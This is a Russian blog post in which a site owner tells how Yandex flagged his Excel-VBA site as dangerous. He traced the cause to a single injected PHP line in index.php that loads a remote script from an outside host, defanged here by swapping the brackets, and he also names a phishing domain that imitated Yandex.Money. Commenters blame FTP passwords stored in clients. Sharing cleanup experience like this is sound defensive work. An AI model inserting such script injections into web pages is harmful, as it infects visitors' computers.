На сайте обнаружен потенциально опасный код

Да, именно такое сообщение пришло мне вчера. Вот полный текст:


На страницах вашего сайта www.excel-vba.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных.
В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».
Яндекс никак не оценивает содержание сайта и предупреждает пользователей о том, что сайт мог быть заражен без ведома его владельцев.
Пожалуйста, удалите вредоносный код. Если при новой проверке код не будет обнаружен, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.

---
С уважением,
Яндекс.Вебмастер
http://webmaster.yandex.ru


Меня это не сильно устраивало, т.к. количество переходов на сайт значительно сократилось, а сам сайт в выдаче поисковика Яндекс выглядел с надписью "прокаженного":

Я и сам на такие сайты страюсь не переходить. Но самое интересное для меня было, что на какую бы страницу своего сайта я ни переходил - ничего подозрительного не происходило. Проверка на вирусы моего ПК ничего не дала. Сканирование файлов содержимого сайта так же не привело к успеху. Обидно, если честно. Тогда я вспомнил, что перед этим на днях мне пришло письмо с Яндекс.Денег (точнее, якобы с Яндекс.Денег) о том, что мой счет заморожен. Все ссылки вроде как выглядели нормально, хоть и само по себе письмо очень странно - Яндекс такие не рассылает. Решил все же перейти - антивирус у меня вроде в порядке и должен был отреагировать. При переходе по ссылке попал на страницу, ну очень похожую на Яндексовую. Но адрес никак не был похож на адрес Яндекса. Я специально даже записал его. Весь приводить не буду, но в нем содержалась ссылка на: money-yandex.besaba.com. Антивирус никак не отреагировал. Конечно же, поиск ссылок именно на этот сайт я тоже больше нигде не обнаружил. Ничего не оставалось делать кроме как копать файлы сайта вручную. Было уже поздно - решил сделать это на следующий день, попутно проклиная Яндекс, который почему-то мой сайт так наказал.

Следующий день меня порадовал - при открытии главной странички моего сайта я получил предупреждение антивируса:

Вирус Exploit.JS.Pdfka.PWF. Как я выяснил, у него много имен, а если быть точнее, то расширений. Имя всегда одно - Exploit.JS.Pdfka, а расширение может быть различным: Exploit.JS.Pdfka.aa, Exploit.JS.Pdfka.agu, Exploit.JS.Pdfka.asd. Т.е. по сути Яндекс очень большой молодец, надо сказать. Вирус отловил моментально, о чем и меня предупредил, и посетителей моего сайта. Лучше пусть упадет посещаемость, чем возрастет вирусность :-)
Естественно, я начал шерстить файлы сайта и начал я с файлов index.php. Сразу же на втором меня постигла удача - внутри файла помимо привычного содержимого была всего одна строчка:

echo '(script src="http://kinoshkaxa.changeip.name/rsize.js")(/script)';

В приведенной строке я заменил символ < на (, а > на ). Иначе интерпретатор кодов съедает текст скрипта.

После удаления этой строки вирус убыл...Ну, по крайней мере антивирус уже не реагировал на мой сайт, как на угрозу. Проблема, вроде как решена. Напишу, как только Яндекс снимет с меня клеймо "прокаженного" :-)

P.S. Ну вот, через день после того, как я удалил вирус, Яндекс перестал видеть в моем сайте угрозу. Хоть они и пишут, что снятие порчи может занять до двух недель - сняли быстро :-)

Надеюсь, данная статья поможет кому-нибудь еще отловить этот вирус у себя.

Loading

Похожие записи

4 комментария

  1. Дмитрий, столкнулся с той-же проблемой. Следует добавить что для того что-бы избежать повторного заражения админам сайтов необходимо сменить пароли от ftp и впредь не хранить их в программах. У меня несколько сайтов на разных договорах в РУЦЕНТРЕ, все оказались заражены. Вывод - утечка через Total, им пользуюсь для ftp.

  2. Еще возможная причина - ftp-client FileZilla. Возможно внедрение вредоносных кодов, если пароль к ftp-аккаунту хранится в программе. Возможно, что и остальные клиенты могут содержать "дыры" именно при автоматическом подключении к аккаунту.

Добавить комментарий

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.